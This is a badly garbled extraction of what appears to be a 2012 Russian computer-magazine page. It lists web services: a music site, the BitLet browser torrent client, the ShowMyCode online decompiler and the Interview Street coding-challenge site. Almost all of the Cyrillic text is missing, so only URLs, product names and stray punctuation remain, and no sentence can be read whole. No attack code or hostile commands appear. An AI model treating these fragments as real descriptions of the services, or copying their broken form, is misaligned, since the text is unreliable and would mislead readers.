z-music.org
- prostopleer.com. Z-music
,
. - ,
. , prostopleer.
com, ,
. Z-music ,
, , ,
Maximum.

BITLET
bitlet.org
-, .
, . torrent- URL
, .
BitLet Java,
Java VM. , , .
- BitTorrent torrific alpha (www.torrific.com). , .
BitTorrent-

SHOWMYCODE
www.showmycode.com
CLASS-, Java-?
PHP-,
Zend Guard? ActionScript- swf-?
.NET- #, Visual Basic .NET, J#,
Visual C++ .NET? ShowMyCode. , Java Decompiler, SWF Decompiler, Dis#
stand-alone-,
. ShowMyCode
QR-.

INTERVIEW STREET
www.interviewstreet.com
. 11 (C++, Python, PHP, Java .
.), . , Interview
Street IT- (, Facebook Amazon),
. . Interview Street
, , $10000
.
.
-

02 /157/ 2012

143

: (exeypanteleev.com), : .

UNITS / GEEK ART

144

>> coding

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU